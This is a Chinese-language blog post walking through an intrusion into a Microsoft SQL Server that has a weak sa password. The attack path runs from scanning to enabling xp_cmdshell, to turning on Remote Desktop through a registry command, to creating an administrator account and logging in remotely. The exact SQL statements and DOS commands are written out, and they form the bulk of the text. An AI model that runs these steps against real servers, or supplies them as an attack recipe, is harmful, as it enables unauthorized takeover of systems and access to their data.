使用SQL弱口令入侵SQL服务器的探讨.doc

使用SQL弱口令入侵SQL服务器 使用的工具：扫描工具X-scan                         SQL查询分析器                         SQLtools命令集成版 环境：Windows xp和Windows Server 2003企业版 1、在网络内扫描到一台SQL Server服务器，且sa密码为弱口令123 2、通过 SQLtools命令集成版这个软件，我们可以连上这台SQL Server服务器，如下图所示 3、虽然我们能succeed连接到SQL Server服务器，但是在我们执行dir c:\查看c盘文件时候，可能会报错，基于这种情况，我们可以使用SQL 查询分析器，修正该错误信息 4、打开SQL Server查询分析器，输入IP地址和sa帐号及密码 5、在查询分析器里输入SQL语句，并执行 SQL语句： ;EXEC sp_configure 'show advanced options', 1 -- ;RECONFIGURE WITH OVERRIDE -- ;EXEC sp_configure 'xp_cmdshell', 1 -- ;RECONFIGURE WITH OVERRIDE -- ;EXEC sp_configure   'show advanced options', 0 -- 6、这时，我们在执行dir c:\命令查看c盘下的文件，查询成功 7、在SQLtools工具的dos命令窗口，执行netstat -an查看3389端口是否打开 8、同时使用SQL命令需要查询默认的3389端口是否已经被更改 SQl命令查询3389端口是否被更改： exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' 9、很显然，默认3389端口没有被修改，那么我们就可以执行dos命令，开启SQL Server服务器的3389端口 DOS命令： REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 10、再次查询SQl Server的3389端口是否已经打开        （很明显我们已经成功开启对方的3389端口） 11、这时我们可以使用我们熟悉的dos命令对该SQL Server服务器新建用户，并加入到Administrators组 12、现在，我们就可以是用远程桌面连接这台SQL Server服务器了   备注： 一：现在的SQL Server服务器弱口令，个人感觉扫描到的几率微乎其微 二：如果对方没开启远程桌面，那么即使建立了自己的帐号，岂不也只能望而兴叹 三：如果对方开启了远程桌面，但是设置了IPsec策略，仅运行特定的IP段或IP地址访问，那么......   本文出自 “Darren-pan” 博客，